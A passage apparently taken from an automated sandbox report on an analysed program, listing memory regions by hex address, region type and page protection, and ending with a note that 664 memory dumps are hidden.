heap
|
page read and write
|
||
|
248C0000
|
direct allocation
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
974C000
|
heap
|
page read and write
|
||
|
A40000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
2E9F000
|
stack
|
page read and write
|
||
|
451000
|
unkown
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
9780000
|
heap
|
page read and write
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
46E1000
|
heap
|
page read and write
|
||
|
7C1C000
|
stack
|
page read and write
|
||
|
8E0000
|
heap
|
page read and write
|
||
|
2A6F000
|
stack
|
page read and write
|
||
|
323D000
|
stack
|
page read and write
|
||
|
46F3000
|
heap
|
page read and write
|
||
|
8A30000
|
trusted library allocation
|
page execute and read and write
|
||
|
975000
|
heap
|
page read and write
|
||
|
326D000
|
heap
|
page read and write
|
||
|
719E000
|
stack
|
page read and write
|
||
|
72E0000
|
direct allocation
|
page read and write
|
||
|
7BD0000
|
trusted library allocation
|
page read and write
|
||
|
7B4000
|
heap
|
page read and write
|
||
|
975000
|
heap
|
page read and write
|
||
|
25E40000
|
unclassified section
|
page execute and read and write
|
||
|
321E000
|
stack
|
page read and write
|
||
|
970D000
|
heap
|
page read and write
|
||
|
8750000
|
trusted library allocation
|
page read and write
|
||
|
9776000
|
heap
|
page read and write
|
||
|
4AE0000
|
trusted library allocation
|
page read and write
|
||
|
31E0000
|
trusted library section
|
page read and write
|
||
|
7B00000
|
trusted library allocation
|
page execute and read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
640000
|
heap
|
page read and write
|
||
|
940000
|
heap
|
page read and write
|
||
|
46E4000
|
heap
|
page read and write
|
||
|
792A000
|
heap
|
page read and write
|
||
|
85C000
|
stack
|
page read and write
|
||
|
51B7000
|
trusted library allocation
|
page read and write
|
||
|
46C0000
|
heap
|
page read and write
|
||
|
4AE4000
|
trusted library allocation
|
page read and write
|
||
|
3390000
|
heap
|
page read and write
|
||
|
25A39000
|
heap
|
page read and write
|
||
|
257A1000
|
heap
|
page read and write
|
||
|
8690000
|
trusted library allocation
|
page read and write
|
||
|
27AD000
|
stack
|
page read and write
|
||
|
286F000
|
stack
|
page read and write
|
||
|
2BA8000
|
heap
|
page read and write
|
||
|
975000
|
heap
|
page read and write
|
||
|
9698000
|
heap
|
page read and write
|
||
|
72C0000
|
direct allocation
|
page read and write
|
||
|
46E0000
|
heap
|
page read and write
|
||
|
7A1E000
|
stack
|
page read and write
|
||
|
4F10000
|
trusted library allocation
|
page read and write
|
||
|
975000
|
heap
|
page read and write
|
||
|
48FC000
|
remote allocation
|
page execute and read and write
|
||
|
25A9B000
|
heap
|
page read and write
|
||
|
4F0F000
|
stack
|
page read and write
|
||
|
331F000
|
stack
|
page read and write
|
||
|
2B3E000
|
stack
|
page read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
D14C000
|
direct allocation
|
page execute and read and write
|
||
|
9780000
|
heap
|
page read and write
|
||
|
84FC000
|
remote allocation
|
page execute and read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
2F17000
|
heap
|
page read and write
|
||
|
46FE000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
6069000
|
trusted library allocation
|
page read and write
|
||
|
254ED000
|
stack
|
page read and write
|
||
|
42C000
|
unkown
|
page read and write
|
||
|
93F0000
|
direct allocation
|
page execute and read and write
|
||
|
4B12000
|
trusted library allocation
|
page read and write
|
||
|
7ADD000
|
stack
|
page read and write
|
||
|
2536E000
|
stack
|
page read and write
|
||
|
25A52000
|
heap
|
page read and write
|
||
|
74F000
|
stack
|
page read and write
|
||
|
709E000
|
stack
|
page read and write
|
||
|
2F1E000
|
heap
|
page read and write
|
||
|
7AF0000
|
trusted library allocation
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
7240000
|
direct allocation
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
9728000
|
heap
|
page read and write
|
||
|
99C6000
|
heap
|
page read and write
|
||
|
2A5E000
|
unkown
|
page read and write
|
||
|
7FC000
|
stack
|
page read and write
|
||
|
248F0000
|
direct allocation
|
page read and write
|
||
|
7B30000
|
trusted library allocation
|
page read and write
|
||
|
2529F000
|
stack
|
page read and write
|
||
|
2B3E000
|
stack
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page read and write
|
||
|
25210000
|
remote allocation
|
page read and write
|
||
|
46E4000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
A94C000
|
direct allocation
|
page execute and read and write
|
||
|
25A39000
|
heap
|
page read and write
|
||
|
4701000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
8C50000
|
trusted library allocation
|
page read and write
|
||
|
4F10000
|
trusted library allocation
|
page read and write
|
||
|
4B97000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
9960000
|
heap
|
page readonly
|
||
|
309E000
|
stack
|
page read and write
|
||
|
24890000
|
direct allocation
|
page read and write
|
||
|
5160000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
24880000
|
direct allocation
|
page read and write
|
||
|
4B30000
|
trusted library allocation
|
page read and write
|
||
|
4BD2000
|
heap
|
page read and write
|
||
|
4701000
|
heap
|
page read and write
|
||
|
46F3000
|
heap
|
page read and write
|
||
|
3500000
|
heap
|
page read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
7860000
|
heap
|
page read and write
|
||
|
4F10000
|
trusted library allocation
|
page read and write
|
||
|
2260000
|
heap
|
page read and write
|
||
|
977B000
|
heap
|
page read and write
|
||
|
7230000
|
direct allocation
|
page read and write
|
||
|
30B4000
|
heap
|
page read and write
|
||
|
4F28000
|
trusted library allocation
|
page read and write
|
||
|
2BA0000
|
heap
|
page read and write
|
||
|
477A000
|
heap
|
page read and write
|
||
|
255AF000
|
stack
|
page read and write
|
||
|
46F8000
|
heap
|
page read and write
|
||
|
B877000
|
trusted library allocation
|
page read and write
|
||
|
2C20000
|
heap
|
page read and write
|
||
|
4F50000
|
trusted library allocation
|
page read and write
|
||
|
787A000
|
heap
|
page read and write
|
||
|
32DE000
|
stack
|
page read and write
|
||
|
7280000
|
direct allocation
|
page read and write
|
||
|
24DFE000
|
stack
|
page read and write
|
||
|
25626000
|
direct allocation
|
page execute and read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
46E9000
|
heap
|
page read and write
|
||
|
975000
|
heap
|
page read and write
|
||
|
8F0000
|
heap
|
page readonly
|
||
|
25A69000
|
heap
|
page read and write
|
||
|
4AE3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2F1A000
|
heap
|
page read and write
|
||
|
7970000
|
trusted library allocation
|
page read and write
|
||
|
620000
|
heap
|
page read and write
|
||
|
25611000
|
direct allocation
|
page execute and read and write
|
||
|
645000
|
heap
|
page read and write
|
||
|
40D000
|
unkown
|
page read and write
|
||
|
9690000
|
heap
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
2F1C000
|
heap
|
page read and write
|
||
|
85C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7960000
|
trusted library allocation
|
page read and write
|
||
|
9970000
|
direct allocation
|
page read and write
|
||
|
25E19000
|
unclassified section
|
page execute and read and write
|
||
|
9780000
|
heap
|
page read and write
|
||
|
322A000
|
heap
|
page read and write
|
||
|
4BD1000
|
heap
|
page read and write
|
||
|
46F0000
|
heap
|
page read and write
|
||
|
335E000
|
stack
|
page read and write
|
||
|
24900000
|
direct allocation
|
page read and write
|
||
|
61F6000
|
trusted library allocation
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
46E9000
|
heap
|
page read and write
|
||
|
71C5000
|
heap
|
page execute and read and write
|
||
|
347F000
|
stack
|
page read and write
|
||
|
4F10000
|
trusted library allocation
|
page read and write
|
||
|
470C000
|
heap
|
page read and write
|
||
|
975000
|
heap
|
page read and write
|
||
|
2592C000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
320E000
|
stack
|
page read and write
|
||
|
4BD1000
|
heap
|
page read and write
|
||
|
46E0000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
46F1000
|
heap
|
page read and write
|
||
|
46E0000
|
heap
|
page read and write
|
||
|
9780000
|
heap
|
page read and write
|
||
|
4BD1000
|
heap
|
page read and write
|
||
|
4AD0000
|
trusted library allocation
|
page read and write
|
||
|
46E1000
|
heap
|
page read and write
|
||
|
769E000
|
stack
|
page read and write
|
||
|
DB4C000
|
direct allocation
|
page execute and read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
9776000
|
heap
|
page read and write
|
||
|
890C000
|
stack
|
page read and write
|
||
|
46F1000
|
heap
|
page read and write
|
||
|
7850000
|
heap
|
page execute and read and write
|
||
|
555E000
|
trusted library allocation
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
4BBE000
|
stack
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
4F60000
|
heap
|
page execute and read and write
|
||
|
30B3000
|
heap
|
page read and write
|
||
|
7BB0000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
19A000
|
stack
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
85A7000
|
stack
|
page read and write
|
||
|
257C0000
|
heap
|
page read and write
|
||
|
7270000
|
direct allocation
|
page read and write
|
||
|
7871000
|
heap
|
page read and write
|
||
|
7CF000
|
heap
|
page read and write
|
||
|
215E000
|
stack
|
page read and write
|
||
|
3288000
|
heap
|
page read and write
|
||
|
9766000
|
heap
|
page read and write
|
||
|
5560000
|
trusted library allocation
|
page read and write
|
||
|
4FAC000
|
stack
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
4F10000
|
trusted library allocation
|
page read and write
|
||
|
454000
|
unkown
|
page readonly
|
||
|
974000
|
heap
|
page read and write
|
||
|
974000
|
heap
|
page read and write
|
||
|
3220000
|
heap
|
page read and write
|
||
|
788A000
|
heap
|
page read and write
|
||
|
4B90000
|
heap
|
page read and write
|
||
|
329F000
|
stack
|
page read and write
|
||
|
30A0000
|
heap
|
page read and write
|
||
|
8710000
|
trusted library allocation
|
page read and write
|
||
|
3360000
|
heap
|
page read and write
|
||
|
4B15000
|
trusted library allocation
|
page execute and read and write
|
||
|
72A0000
|
direct allocation
|
page read and write
|
||
|
791A000
|
heap
|
page read and write
|
||
|
46ED000
|
heap
|
page read and write
|
There are 664 hidden memdumps, click here to show them.